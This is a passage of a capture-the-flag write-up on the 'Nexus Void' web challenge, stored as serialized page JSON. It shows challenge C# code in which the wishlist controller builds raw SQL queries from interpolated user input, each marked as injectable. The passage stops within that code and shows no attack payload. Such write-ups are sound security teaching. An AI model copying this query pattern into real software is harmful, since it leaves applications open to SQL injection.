[{"data":1,"prerenderedAt":5344},["ShallowReactive",2],{"content-query-alNqsrA1jm":3},{"_path":4,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":8,"description":7,"head":9,"body":28,"_type":5338,"_id":5339,"_source":5340,"_file":5341,"_stem":5342,"_extension":5343},"/writeups/nexus-void","writeups",false,"","Nexus Void",{"title":8,"description":10,"keywords":11,"slug":12,"image":13,"date":14,"meta":15},"Writeup of Nexus Void a medium web challenge from htb-uni ctf 2023. Is about sql injection and deserialization.","web,sqli,deserialization","nexus-void","https://res.cloudinary.com/dmju5zuhr/image/upload/v1704230872/writeups/htb-uni-2023.webp","2023-12-07",[16,17,19,20,22,24,25,26],{"og:image":13},{"og:title":18},"Nexus Void writeup",{"og:description":10},{"og:type":21},"article",{"og:url":23},"https://owalid.com/nexus-void",{"description":10},{"title":18},{"keywords":27},"web,sqli,deserialization,htb,ctf,writeup",{"type":29,"children":30,"toc":5332},"root",[31,38,45,51,57,63,68,73,1691,1696,1702,1707,1712,2131,2136,2800,2809,2816,2821,2826,2831,2836,2841,2846,2851,2856,3512,3517,3529,3535,3540,3553,3724,3729,3740,3760,3770,3775,3788,4237,4250,4969,4981,4986,4992,4997,5004,5016,5021,5118,5123,5129,5148,5159,5165,5170,5175,5179,5184,5188,5193,5197,5209,5278,5290,5295,5304,5308,5313,5317,5322,5326],{"type":32,"tag":33,"props":34,"children":35},"element","h1",{"id":12},[36],{"type":37,"value":8},"text",{"type":32,"tag":39,"props":40,"children":42},"h2",{"id":41},"introduction",[43],{"type":37,"value":44},"Introduction",{"type":32,"tag":46,"props":47,"children":48},"p",{},[49],{"type":37,"value":50},"Nexus Void is a medium web challenge from htb-uni ctf 2023. Is about sql injection and deserialization. The code is written in c# and the database is sqlite.",{"type":32,"tag":52,"props":53,"children":56},"custom-image",{"imgSrc":54,":width":55},"https://res.cloudinary.com/dmju5zuhr/image/upload/v1704402027/writeups/nexus-void/architecture_challenge.webp","300",[],{"type":32,"tag":39,"props":58,"children":60},{"id":59},"sqli",[61],{"type":37,"value":62},"Sqli",{"type":32,"tag":46,"props":64,"children":65},{},[66],{"type":37,"value":67},"If we carefully read the source code, we can see that no query to the database is protected. They are all vulnerable to SQL injection.",{"type":32,"tag":46,"props":69,"children":70},{},[71],{"type":37,"value":72},"Here are some examples below:",{"type":32,"tag":74,"props":75,"children":77},"code-card",{"lang":76},"csharp",[78],{"type":32,"tag":79,"props":80,"children":83},"pre",{"code":81,"language":76,"meta":7,"className":82,"style":7},"// Controllers/HomeController.cs\npublic IActionResult Wishlist()\n{\n string ID = HttpContext.Items[\"ID\"].ToString();\n string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID='{ID}'\"; // \u003C--- SQLI\n\n [...]\n}\n[...]\n\npublic IActionResult Wishlist(string name, string sellerName)\n{\n string ID = HttpContext.Items[\"ID\"].ToString();\n string sqlQueryGetWishlist = $\"SELECT * from Wishlist WHERE ID={ID}\"; // \u003C--- SQLI\n var wishlist = _db.Wishlist.FromSqlRaw(sqlQueryGetWishlist).FirstOrDefault();\n string sqlQueryProduct = $\"SELECT * from Products WHERE name='{name}' AND sellerName='{sellerName}'\"; // \u003C--- SQLI\n var product = _db.Products.FromSqlRaw(sqlQueryProduct).FirstOrDefault();\n if(!string.IsNullOrEmpty(product.name))\n {\n if (wishlist != null && !string.IsNullOrEmpty(wishlist.data))\n {\n List\u003CProductModel> products = SerializeHelper.Deserialize(wishlist.data);\n ProductModel result = products.Find(x => x.name == product.name);\n\n if (result != null)\n {\n return Content(\"Product already exists\");\n }\n\n products.Add(product);\n string serializedData = SerializeHelper.Serialize(products);\n string sqlQueryAddWishlist = $\"UPDATE Wishlist SET data='{serializedData}' WHERE ID={ID}\"; // \u003C--- SQLI\n _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n }\n else\n {\n string username = HttpContext.Items[\"username\"].ToString();\n List\u003CProductModel> wishListProducts = new List\u003CProductModel>();\n wishListProducts.Add(product);\n string serializedData = SerializeHelper.Serialize(wishListProducts);\n string sqlQueryAddWishlist = $\"INSERT INTO Wishlist(ID, username, data) VALUES({ID},'{username}', '{serializedData}')\"; // \u003C--- SQLI\n _db.Database.ExecuteSqlRaw(sqlQueryAddWishlist);\n }\n return Content(\"Added\");\n }\n return Content(\"Invalid\");\n}\n","language-csharp shiki shiki-themes vitesse-dark",[84],{"type":32,"tag":85,"props":86,"children":87},"code",{"__ignoreMap":7},[88,100,128,137,209,269,279,303,312,329,337,388,396,452,501,565,638,697,750,759,831,840,908,987,995,1025,1034,1069,1078,1086,1116,1160,1228,1268,1277,1286,1294,1352,1404,1433,1474,1562,1598,1606,1640,1649,1683],{"type":32,"tag":89,"props":90,"children":93},"span",{"class":91,"line":92},"line",1,[94],{"type":32,"tag":89,"props":95,"children":97},{"style":96},"--shiki-default:#758575DD",[98],{"type":37,"value":99},"// Controllers/HomeController.cs\n",{"type":32,"tag":89,"props":101,"children":103},{"class":91,"line":102},2,[104,110,116,122],{"type":32,"tag":89,"props":105,"children":107},{"style":106},"--shiki-default:#CB7676",[108],{"type":37,"value":109},"public",{"type":32,"tag":89,"props":111,"children":113},{"style":112},"--shiki-default:#5DA994",[114],{"type":37,"value":115}," IActionResult",{"type":32,"tag":89,"props":117,"children":119},{"style":118},"--shiki-default:#80A665",[120],{"type":37,"value":121}," Wishlist",{"type":32,"tag":89,"props":123,"children":125},{"style":124},"--shiki-default:#666666",[126],{"type":37,"value":127},"()\n",{"type":32,"tag":89,"props":129,"children":131},{"class":91,"line":130},3,[132],{"type":32,"tag":89,"props":133,"children":134},{"style":124},[135],{"type":37,"value":136},"{\n",{"type":32,"tag":89,"props":138,"children":140},{"class":91,"line":139},4,[141,147,152,157,163,168,173,178,184,190,194,199,204],{"type":32,"tag":89,"props":142,"children":144},{"style":143},"--shiki-default:#4D9375",[145],{"type":37,"value":146}," string",{"type":32,"tag":89,"props":148,"children":149},{"style":118},[150],{"type":37,"value":151}," ID",{"type":32,"tag":89,"props":153,"children":154},{"style":124},[155],{"type":37,"value":156}," =",{"type":32,"tag":89,"props":158,"children":160},{"style":159},"--shiki-default:#BD976A",[161],{"type":37,"value":162}," HttpContext",{"type":32,"tag":89,"props":164,"children":165},{"style":124},[166],{"type":37,"value":167},".",{"type":32,"tag":89,"props":169,"children":170},{"style":159},[171],{"type":37,"value":172},"Items",{"type":32,"tag":89,"props":174,"children":175},{"style":124},[176],{"type":37,"value":177},"[",{"type":32,"tag":89,"props":179,"children":181},{"style":180},"--shiki-default:#C98A7D77",[182],{"type":37,"value":183},"\"",{"type":32,"tag":89,"props":185,"children":187},{"style":186},"--shiki-default:#C98A7D",[188],{"type":37,"value":189},"ID",{"type":32,"tag":89,"props":191,"children":192},{"style":180},[193],{"type":37,"value":183},{"type":32,"tag":89,"props":195,"children":196},{"style":124},[197],{"type":37,"value":198},"].",{"type":32,"tag":89,"props":200,"children":201},{"style":118},[202],{"type":37,"value":203},"ToString",{"type":32,"tag":89,"props":205,"children":206},{"style":124},[207],{"type":37,"value":208},"();\n",{"type":32,"tag":89,"props":210,"children":212},{"class":91,"line":211},5,[213,217,222,226,231,236,241,245,250,255,259,264],{"type":32,"tag":89,"props":214,"children":215},{"style":143},[216],{"type":37,"value":146},{"type":32,"tag":89,"props":218,"children":219},{"style":118},[220],{"type":37,"value":221}," sqlQueryGetWishlist",{"type":32,"tag":89,"props":223,"children":224},{"style":124},[225],{"type":37,"value":156},{"type":32,"tag":89,"props":227,"children":228},{"style":180},[229],{"type":37,"value":230}," $\"",{"type":32,"tag":89,"props":232,"children":233},{"style":186},[234],{"type":37,"value":235},"SELECT * from Wishlist WHERE ID='",{"type":32,"tag":89,"props":237,"children":238},{"style":124},[239],{"type":37,"value":240},"{",{"type":32,"tag":89,"props":242,"children":243},{"style":186},[244],{"type":37,"value":189},{"type":32,"tag":89,"props":246,"children":247},{"style":124},[248],{"type":37,"value":249},"}",{"type":32,"tag":89,"props":251,"children":252},{"style":186},[253],{"type":37,"value":254},"'",{"type":32,"tag":89,"props":256,"children":257},{"style":180},[258],{"type":37,"value":183},{"type":32,"tag":89,"props":260,"children":261},{"style":124},[262],{"type":37,"value":263},";",{"type":32,"tag":89,"props":265,"children":266},{"style":96},[267],{"type":37,"value":268}," // \u003C--- SQLI\n",{"type":32,"tag":89,"props":270,"children":272},{"class":91,"line":271},6,[273],{"type":32,"tag":89,"props":274,"children":276},{"emptyLinePlaceholder":275},true,[277],{"type":37,"value":278},"\n",{"type":32,"tag":89,"props":280,"children":282},{"class":91,"line":281},7,[283,288,293,298],{"type":32,"tag":89,"props":284,"children":285},{"style":124},[286],{"type":37,"value":287}," [",{"type":32,"tag":89,"props":289,"children":290},{"style":106},[291],{"type":37,"value":292},"..",{"type":32,"tag":89,"props":294,"children":296},{"style":295},"--shiki-default:#DBD7CAEE",[297],{"type":37,"value":167},{"type":32,"tag":89,"props":299,"children":300},{"style":124},[301],{"type":37,"value":302},"]\n",{"type":32,"tag":89,"props":304,"children":306},{"class":91,"line":305},8,[307],{"type":32,"tag":89,"props":308,"children":309},{"style":124},[310],{"type":37,"value":311},"}\n",{"type":32,"tag":89,"props":313,"children":315},{"class":91,"line":314},9,[316,320,325],{"type":32,"tag":89,"props":317,"children":318},{"style":124},[319],{"type":37,"value":177},{"type":32,"tag":89,"props":321,"children":322},{"style":295},[323],{"type":37,"value":324},"...",{"type":32,"tag":89,"props":326,"children":327},{"style":124},[328],{"type":37,"value":302},{"type":32,"tag":89,"props":330,"children":332},{"class":91,"line":331},10,[333],{"type":32,"tag":89,"props":334,"children":335},{"emptyLinePlaceholder":275},[336],{"type":37,"value":278},{"type":32,"tag":89,"props":338,"children":340},{"class":91,"line":339},11,[341,345,349,353,358,363,368,373,378,383],{"type":32,"tag":89,"props":342,"children":343},{"style":106},[344],{"type":37,"value":109},{"type":32,"tag":89,"props":346,"children":347},{"style":112},[348],{"type":37,"value":115},{"type":32,"tag":89,"props":350,"children":351},{"style":118},[352],{"type":37,"value":121},{"type":32,"tag":89,"props":354,"children":355},{"style":124},[356],{"type":37,"value":357},"(",{"type":32,"tag":89,"props":359,"children":360},{"style":143},[361],{"type":37,"value":362},"string",{"type":32,"tag":89,"props":364,"children":365},{"style":118},[366],{"type":37,"value":367}," name",{"type":32,"tag":89,"props":369,"children":370},{"style":124},[371],{"type":37,"value":372},",",{"type":32,"tag":89,"props":374,"children":375},{"style":143},[376],{"type":37,"value":377}," string",{"type":32,"tag":89,"props":379,"children":380},{"style":118},[381],{"type":37,"value":382}," sellerName",{"type":32,"tag":89,"props":384,"children":385},{"style":124},[386],{"type":37,"value":387},")\n",{"type":32,"tag":89,"props":389,"children":391},{"class":91,"line":390},12,[392],{"type":32,"tag":89,"props":393,"children":394},{"style":124},[395],{"type":37,"value":136},{"type":32,"tag":89,"props":397,"children":399},{"class":91,"line":398},13,[400,404,408,412,416,420,424,428,432,436,440,444,448],{"type":32,"tag":89,"props":401,"children":402},{"style":143},[403],{"type":37,"value":146},{"type":32,"tag":89,"props":405,"children":406},{"style":118},[407],{"type":37,"value":151},{"type":32,"tag":89,"props":409,"children":410},{"style":124},[411],{"type":37,"value":156},{"type":32,"tag":89,"props":413,"children":414},{"style":159},[415],{"type":37,"value":162},{"type":32,"tag":89,"props":417,"children":418},{"style":124},[419],{"type":37,"value":167},{"type":32,"tag":89,"props":421,"children":422},{"style":159},[423],{"type":37,"value":172},{"type":32,"tag":89,"props":425,"children":426},{"style":124},[427],{"type":37,"value":177},{"type":32,"tag":89,"props":429,"children":430},{"style":180},[431],{"type":37,"value":183},{"type":32,"tag":89,"props":433,"children":434},{"style":186},[435],{"type":37,"value":189},{"type":32,"tag":89,"props":437,"children":438},{"style":180},[439],{"type":37,"value":183},{"type":32,"tag":89,"props":441,"children":442},{"style":124},[443],{"type":37,"value":198},{"type":32,"tag":89,"props":445,"children":446},{"style":118},[447],{"type":37,"value":203},{"type":32,"tag":89,"props":449,"children":450},{"style":124},[451],{"type":37,"value":208},{"type":32,"tag":89,"props":453,"children":455},{"class":91,"line":454},14,[456,460,464,468,472,477,481,485,489,493,497],{"type":32,"tag":89,"props":457,"children":458},{"style":143},[459],{"type":37,"value":146},{"type":32,"tag":89,"props":461,"children":462},{"style":118},[463],{"type":37,"value":221},{"type":32,"tag":89,"props":465,"children":466},{"style":124},[467],{"type":37,"value":156},{"type":32,"tag":89,"props":469,"children":470},{"style":180},[471],{"type":37,"value":230},{"type":32,"tag":89,"props":473,"children":474},{"style":186},[475],{"type":37,"value":476},"SELECT * from Wishlist WHERE ID=",{"type":32,"tag":89,"props":478,"children":479},{"style":124},[480],{"type":37,"value":240},{"type":32,"tag":89,"props":482,"children":483},{"style":186},[484],{"type":37,"value":189},{"type":32,"tag":89,"props":486,"children":487},{"style":124},[488],{"type":37,"value":249},{"type":32,"tag":89,"props":490,"children":491},{"style":180},[492],{"type":37,"value":183},{"type":32,"tag":89,"props":494,"children":495},{"style":124},[496],{"type":37,"value":263},{"type":32,"tag":89,"props":498,"children":499},{"style":96},[500],{"type":37,"value":268},{"type":32,"tag":89,"props":502,"children":504},{"class":91,"line":503},15,[505,510,515,519,524,528,533,537,542,546,551,556,561],{"type":32,"tag":89,"props":506,"children":507},{"style":106},[508],{"type":37,"value":509}," var",{"type":32,"tag":89,"props":511,"children":512},{"style":118},[513],{"type":37,"value":514}," wishlist",{"type":32,"tag":89,"props":516,"children":517},{"style":124},[518],{"type":37,"value":156},{"type":32,"tag":89,"props":520,"children":521},{"style":159},[522],{"type":37,"value":523}," _db",{"type":32,"tag":89,"props":525,"children":526},{"style":124},[527],{"type":37,"value":167},{"type":32,"tag":89,"props":529,"children":530},{"style":159},[531],{"type":37,"value":532},"Wishlist",{"type":32,"tag":89,"props":534,"children":535},{"style":124},[536],{"type":37,"value":167},{"type":32,"tag":89,"props":538,"children":539},{"style":118},[540],{"type":37,"value":541},"FromSqlRaw",{"type":32,"tag":89,"props":543,"children":544},{"style":124},[545],{"type":37,"value":357},{"type":32,"tag":89,"props":547,"children":548},{"style":159},[549],{"type":37,"value":550},"sqlQueryGetWishlist",{"type":32,"tag":89,"props":552,"children":553},{"style":124},[554],{"type":37,"value":555},").",{"type":32,"tag":89,"props":557,"children":558},{"style":118},[559],{"type":37,"value":560},"FirstOrDefault",{"type":32,"tag":89,"props":562,"children":563},{"style":124},[564],{"type":37,"value":208},{"type":32,"tag":89,"props":566,"children":568},{"class":91,"line":567},16,[569,573,578,582,586,591,595,600,604,609,613,618,622,626,630,634],{"type":32,"tag":89,"props":570,"children":571},{"style":143},[572],{"type":37,"value":146},{"type":32,"tag":89,"props":574,"children":575},{"style":118},[576],{"type":37,"value":577}," sqlQueryProduct",{"type":32,"tag":89,"props":579,"children":580},{"style":124},[581],{"type":37,"value":156},{"type":32,"tag":89,"props":583,"children":584},{"style":180},[585],{"type":37,"value":230},{"type":32,"tag":89,"props":587,"children":588},{"style":186},[589],{"type":37,"value":590},"SELECT * from Products WHERE name='",{"type":32,"tag":89,"props":592,"children":593},{"style":124},[594],{"type":37,"value":240},{"type":32,"tag":89,"props":596,"children":597},{"style":186},[598],{"type":37,"value":599},"name",{"type":32,"tag":89,"props":601,"children":602},{"style":124},[603],{"type":37,"value":249},{"type":32,"tag":89,"props":605,"children":606},{"style":186},[607],{"type":37,"value":608},"' AND sellerName='",{"type":32,"tag":89,"props":610,"children":611},{"style":124},[612],{"type":37,"value":240},{"type":32,"tag":89,"props":614,"children":615},{"style":186},[616],{"type":37,"value":617},"sellerName",{"type":32,"tag":89,"props":619,"children":620},{"style":124},[621],{"type":37,"value":249},{"type":32,"tag":89,"props":623,"children":624},{"style":186},[625],{"type":37,"value":254},{"type":32,"tag":89,"props":627,"children":628},{"style":180},[629],{"type":37,"value":183},{"type":32,"tag":89,"props":631,"children":632},{"style":124},[633],{"type":37,"value":263},{"type":32,"tag":89,"props":635,"children":636},{"style":96},[637],{"type":37,"value":268},{"type":32,"tag":89,"props":639,"children":641},{"class":91,"line":640},17,[642,646,651,655,659,663,668,672,676,680,685,689,693],{"type":32,"tag":89,"props":643,"children":644},{"style":106},[645],{"type":37,"value":509},{"type":32,"tag":89,"props":647,"children":648},{"style":118},[649],{"type":37,"value":650}," product",{"type":32,"tag":89,"props":652,"children":653},{"style":124},[654],{"type":37,"value":156},{"type":32,"tag":89,"props":656,"children":657},{"style":159},[658],{"type":37,"value":523},{"type":32,"tag":89,"props":660,"children":661},{"style":124},[662],{"type":37,"value":167},{"type":32,"tag":89,"props":664,"children":665},{"style":159},[666],{"type":37,"value":667},"Products",{"type":32,"tag":89,"props":669,"children":670},{"style":124},[671],{"type":37,"value":167},{"type":32,"tag":89,"props":673,"children":674},{"style":118},[675],{"type":37,"value":541},{"type":32,"tag":89,"props":677,"children":678},{"style":124},[679],{"type":37,"value":357},{"type":32,"tag":89,"props":681,"children":682},{"style":159},[683],{"type":37,"value":684},"sqlQueryProduct",{"type":32,"tag":89,"props":686,"children":687},{"style":124},[688],{"type":37,"value":555},{"type":32,"tag":89,"props":690,"children":691},{"style":118},[692],{"type":37,"value":560},{"type":32,"tag":89,"props":694,"children":695},{"style":124},[696],{"type":37,"value":208},{"type":32,"tag":89,"props":698,"children":700},{"class":91,"line":699},18,[701,706,710,715,719,723,728,732,737,741,745],{"type":32,"tag":89,"props":702,"children":703},{"style":143},[704],{"type":37,"value":705}," if",{"type":32,"tag":89,"props":707,"children":708},{"style":124},[709],{"type":37,"value":357},{"type":32,"tag":89,"props":711,"children":712},{"style":106},[713],{"type":37,"value":714},"!",{"type":32,"tag":89,"props":716,"children":717},{"style":143},[718],{"type":37,"value":362},{"type":32,"tag":89,"props":720,"children":721},{"style":124},[722],{"type":37,"value":167},{"type":32,"tag":89,"props":724,"children":725},{"style":118},[726],{"type":37,"value":727},"IsNullOrEmpty",{"type":32,"tag":89,"props":729,"children":730},{"style":124},[731],{"type":37,"value":357},{"type":32,"tag":89,"props":733,"children":734},{"style":159},[735],{"type":37,"value":736},"product",{"type":32,"tag":89,"props":738,"children":739},{"style":124},[740],{"type":37,"value":167},{"type":32,"tag":89,"props":742,"children":743},{"style":159},[744],{"type":37,"value":599},{"type":32,"tag":89,"props":746,"children":747},{"style":124},[748],{"type":37,"value":749},"))\n",{"type":32,"tag":89,"props":751,"children":753},{"class":91,"line":752},19,[754],{"type":32,"tag":89,"props":755,"children":756},{"style":124},[757],{"type":37,"value":758}," {\n",{"type":32,"tag":89,"props":760,"children":762},{"class":91,"line":761},20,[763,768,773,778,783,788,793,798,802,806,810,814,818,822,827],{"type":32,"tag":89,"props":764,"children":765},{"style":143},[766],{"type":37,"value":767}," if",{"type":32,"tag":89,"props":769,"children":770},{"style":124},[771],{"type":37,"value":772}," (",{"type":32,"tag":89,"props":774,"children":775},{"style":159},[776],{"type":37,"value":777},"wishlist",{"type":32,"tag":89,"props":779,"children":780},{"style":106},[781],{"type":37,"value":782}," !=",{"type":32,"tag":89,"props":784,"children":785},{"style":106},[786],{"type":37,"value":787}," null",{"type":32,"tag":89,"props":789,"children":790},{"style":106},[791],{"type":37,"value":792}," &&",{"type":32,"tag":89,"props":794,"children":795},{"style":106},[796],{"type":37,"value":797}," !",{"type":32,"tag":89,"props":799,"children":800},{"style":143},[801],{"type":37,"value":362},{"type":32,"tag":89,"props":803,"children":804},{"style":124},[805],{"type":37,"value":167},{"type":32,"tag":89,"props":807,"children":808},{"style":118},[809],{"type":37,"value":727},{"type":32,"tag":89,"props":811,"children":812},{"style":124},[813],{"type":37,"value":357},{"type":32,"tag":89,"props":815,"children":816},{"style":159},[817],{"type":37,"value":777},{"type":32,"tag":89,"props":819,"children":820},{"style":124},[821],{"type":37,"value":167},{"type":32,"tag":89,"props":823,"children":824},{"style":159},[825],{"type":37,"value":826},"data",{"type":32,"tag":89,"props":828,"children":829},{"style":124},[830],{"type":37,"value":749},{"type":32,"tag":89,"props":832,"children":834},{"class":91,"line":833},21,[835],{"type":32,"tag":89,"props":836,"children":837},{"style":124},[838],{"type":37,"value":839}," {\n",{"type":32,"tag":89,"props":841,"children":843},{"class":91,"line":842},22,[844,849,854,859,864,869,873,878,882,887,891,895,899,903],{"type":32,"tag":89,"props":845,"children":846},{"style":112},[847],{"type":37,"value":848}," List",{"type":32,"tag":89,"props":850,"children":851},{"style":124},[852],{"type":37,"value":853},"\u003C",{"type":32,"tag":89,"props":855,"children":856},{"style":112},[857],{"type":37,"value":858},"ProductModel",{"type":32,"tag":89,"props":860,"children":861},{"style":124},[862],{"type":37,"value":863},">",{"type":32,"tag":89,"props":865,"children":866},{"style":118},[867],{"type":37,"value":868}," products",{"type":32,"tag":89,"props":870,"children":871},{"style":124},[872],{"type":37,"value":156},{"type":32,"tag":89,"props":874,"children":875},{"style":159},[876],{"type":37,"value":877}," SerializeHelper",{"type":32,"tag":89,"props":879,"children":880},{"style":124},[881],{"type":37,"value":167},{"type":32,"tag":89,"props":883,"children":884},{"style":118},[885],{"type":37,"value":886},"Deserialize",{"type":32,"tag":89,"props":888,"children":889},{"style":124},[890],{"type":37,"value":357},{"type":32,"tag":89,"props":892,"children":893},{"style":159},[894],{"type":37,"value":777},{"type":32,"tag":89,"props":896,"children":897},{"style":124},[898],{"type":37,"value":167},{"type":32,"tag":89,"props":900,"children":901},{"style":159},[902],{"type":37,"value":826},{"type":32,"tag":89,"props":904,"children":905},{"style":124},[906],{"type":37,"value":907},");\n",{"type":32,"tag":89,"props":909,"children":911},{"class":91,"line":910},23,[912,917,922,926,930,934,939,943,948,953,958,962,966,971,975,979,983],{"type":32,"tag":89,"props":913,"children":914},{"style":112},[915],{"type":37,"value":916}," ProductModel",{"type":32,"tag":89,"props":918,"children":919},{"style":118},[920],{"type":37,"value":921}," result",{"type":32,"tag":89,"props":923,"children":924},{"style":124},[925],{"type":37,"value":156},{"type":32,"tag":89,"props":927,"children":928},{"style":159},[929],{"type":37,"value":868},{"type":32,"tag":89,"props":931,"children":932},{"style":124},[933],{"type":37,"value":167},{"type":32,"tag":89,"props":935,"children":936},{"style":118},[937],{"type":37,"value":938},"Find",{"type":32,"tag":89,"props":940,"children":941},{"style":124},[942],{"type":37,"value":357},{"type":32,"tag":89,"props":944,"children":945},{"style":118},[946],{"type":37,"value":947},"x",{"type":32,"tag":89,"props":949,"children":950},{"style":106},[951],{"type":37,"value":952}," =>",{"type":32,"tag":89,"props":954,"children":955},{"style":159},[956],{"type":37,"value":957}," x",{"type":32,"tag":89,"props":959,"children":960},{"style":124},[961],{"type":37,"value":167},{"type":32,"tag":89,"props":963,"children":964},{"style":159},[965],{"type":37,"value":599},{"type":32,"tag":89,"props":967,"children":968},{"style":106},[969],{"type":37,"value":970}," ==",{"type":32,"tag":89,"props":972,"children":973},{"style":159},[974],{"type":37,"value":650},{"type":32,"tag":89,"props":976,"children":977},{"style":124},[978],{"type":37,"value":167},{"type":32,"tag":89,"props":980,"children":981},{"style":159},[982],{"type":37,"value":599},{"type":32,"tag":89,"props":984,"children":985},{"style":124},[986],{"type":37,"value":907},{"type":32,"tag":89,"props":988,"children":990},{"class":91,"line":989},24,[991],{"type":32,"tag":89,"props":992,"children":993},{"emptyLinePlaceholder":275},[994],{"type":37,"value":278},{"type":32,"tag":89,"props":996,"children":998},{"class":91,"line":997},25,[999,1004,1008,1013,1017,1021],{"type":32,"tag":89,"props":1000,"children":1001},{"style":143},[1002],{"type":37,"value":1003}," if",{"type":32,"tag":89,"props":1005,"children":1006},{"style":124},[1007],{"type":37,"value":772},{"type":32,"tag":89,"props":1009,"children":1010},{"style":159},[1011],{"type":37,"value":1012},"result",{"type":32,"tag":89,"props":1014,"children":1015},{"style":106},[1016],{"type":37,"value":782},{"type":32,"tag":89,"props":1018,"children":1019},{"style":106},[1020],{"type":37,"value":787},{"type":32,"tag":89,"props":1022,"children":1023},{"style":124},[1024],{"type":37,"value":387},{"type":32,"tag":89,"props":1026,"children":1028},{"class":91,"line":1027},26,[1029],{"type":32,"tag":89,"props":1030,"children":1031},{"style":124},[1032],{"type":37,"value":1033}," {\n",{"type":32,"tag":89,"props":1035,"children":1037},{"class":91,"line":1036},27,[1038,1043,1048,1052,1056,1061,1065],{"type":32,"tag":89,"props":1039,"children":1040},{"style":143},[1041],{"type":37,"value":1042}," return",{"type":32,"tag":89,"props":1044,"children":1045},{"style":118},[1046],{"type":37,"value":1047}," Content",{"type":32,"tag":89,"props":1049,"children":1050},{"style":124},[1051],{"type":37,"value":357},{"type":32,"tag":89,"props":1053,"children":1054},{"style":180},[1055],{"type":37,"value":183},{"type":32,"tag":89,"props":1057,"children":1058},{"style":186},[1059],{"type":37,"value":1060},"Product already exists",{"type":32,"tag":89,"props":1062,"children":1063},{"style":180},[1064],{"type":37,"value":183},{"type":32,"tag":89,"props":1066,"children":1067},{"style":124},[1068],{"type":37,"value":907},{"type":32,"tag":89,"props":1070,"children":1072},{"class":91,"line":1071},28,[1073],{"type":32,"tag":89,"props":1074,"children":1075},{"style":124},[1076],{"type":37,"value":1077}," }\n",{"type":32,"tag":89,"props":1079,"children":1081},{"class":91,"line":1080},29,[1082],{"type":32,"tag":89,"props":1083,"children":1084},{"emptyLinePlaceholder":275},[1085],{"type":37,"value":278},{"type":32,"tag":89,"props":1087,"children":1089},{"class":91,"line":1088},30,[1090,1095,1099,1104,1108,1112],{"type":32,"tag":89,"props":1091,"children":1092},{"style":159},[1093],{"type":37,"value":1094}," products",{"type":32,"tag":89,"props":1096,"children":1097},{"style":124},[1098],{"type":37,"value":167},{"type":32,"tag":89,"props":1100,"children":1101},{"style":118},[1102],{"type":37,"value":1103},"Add",{"type":32,"tag":89,"props":1105,"children":1106},{"style":124},[1107],{"type":37,"value":357},{"type":32,"tag":89,"props":1109,"children":1110},{"style":159},[1111],{"type":37,"value":736},{"type":32,"tag":89,"props":1113,"children":1114},{"style":124},[1115],{"type":37,"value":907},{"type":32,"tag":89,"props":1117,"children":1119},{"class":91,"line":1118},31,[1120,1125,1130,1134,1138,1142,1147,1151,1156],{"type":32,"tag":89,"props":1121,"children":1122},{"style":143},[1123],{"type":37,"value":1124}," string",{"type":32,"tag":89,"props":1126,"children":1127},{"style":118},[1128],{"type":37,"value":1129}," serializedData",{"type":32,"tag":89,"props":1131,"children":1132},{"style":124},[1133],{"type":37,"value":156},{"type":32,"tag":89,"props":1135,"children":1136},{"style":159},[1137],{"type":37,"value":877},{"type":32,"tag":89,"props":1139,"children":1140},{"style":124},[1141],{"type":37,"value":167},{"type":32,"tag":89,"props":1143,"children":1144},{"style":118},[1145],{"type":37,"value":1146},"Serialize",{"type":32,"tag":89,"props":1148,"children":1149},{"style":124},[1150],{"type":37,"value":357},{"type":32,"tag":89,"props":1152,"children":1153},{"style":159},[1154],{"type":37,"value":1155},"products",{"type":32,"tag":89,"props":1157,"children":1158},{"style":124},[1159],{"type":37,"value":907},{"type":32,"tag":89,"props":1161,"children":1163},{"class":91,"line":1162},32,[1164,1168,1173,1177,1181,1186,1190,1195,1199,1204,1208,1212,1216,1220,1224],{"type":32,"tag":89,"props":1165,"children":1166},{"style":143},[1167],{"type":37,"value":1124},{"type":32,"tag":89,"props":1169,"children":1170},{"style":118},[1171],{"type":37,"value":1172}," sqlQueryAddWishlist",{"type":32,"tag":89,"props":1174,"children":1175},{"style":124},[1176],{"type":37,"value":156},{"type":32,"tag":89,"props":1178,"children":1179},{"style":180},[1180],{"type":37,"value":230},{"type":32,"tag":89,"props":1182,"children":1183},{"style":186},[1184],{"type":37,"value":1185},"UPDATE Wishlist SET data='",{"type":32,"tag":89,"props":1187,"children":1188},{"style":124},[1189],{"type":37,"value":240},{"type":32,"tag":89,"props":1191,"children":1192},{"style":186},[1193],{"type":37,"value":1194},"serializedData",{"type":32,"tag":89,"props":1196,"children":1197},{"style":124},[1198],{"type":37,"value":249},{"type":32,"tag":89,"props":1200,"children":1201},{"style":186},[1202],{"type":37,"value":1203},"' WHERE ID=",{"type":32,"tag":89,"props":1205,"children":1206},{"style":124},[1207],{"type":37,"value":240},{"type":32,"tag":89,"props":1209,"children":1210},{"style":186},[1211],{"type":37,"value":189},{"type":32,"tag":89,"props":1213,"children":1214},{"style":124},[1215],{"type":37,"value":249},{"type":32,"tag":89,"props":1217,"children":1218},{"style":180},[1219],{"type":37,"value":183},{"type":32,"tag":89,"props":1221,"children":1222},{"style":124},[1223],{"type":37,"value":263},{"type":32,"tag":89,"props":1225,"children":1226},{"style":96},[1227],{"type":37,"value":268},{"type":32,"tag":89,"props":1229,"children":1231},{"class":91,"line":1230},33,[1232,1237,1241,1246,1250,1255,1259,1264],{"type":32,"tag":89,"props":1233,"children":1234},{"style":159},[1235],{"type":37,"value":1236}," _db",{"type":32,"tag":89,"props":1238,"children":1239},{"style":124},[1240],{"type":37,"value":167},{"type":32,"tag":89,"props":1242,"children":1243},{"style":159},[1244],{"type":37,"value":1245},"Database",{"type":32,"tag":89,"props":1247,"children":1248},{"style":124},[1249],{"type":37,"value":167},{"type":32,"tag":89,"props":1251,"children":1252},{"style":118},[1253],{"type":37,"value":1254},"ExecuteSqlRaw",{"type":32,"tag":89,"props":1256,"children":1257},{"style":124},[1258],{"type":37,"value":357},{"type":32,"tag":89,"props":1260,"children":1261},{"style":159},[1262],{"type":37,"value":1263},"sqlQueryAddWishlist",{"type":32,"tag":89,"props":1265,"children":1266},{"style":124},[1267],{"type":37,"value":907},{"type":32,"tag":89,"props":1269,"children":1271},{"class":91,"line":1270},34,[1272],{"type":32,"tag":89,"props":1273,"children":1274},{"style":124},[1275],{"type":37,"value":1276}," 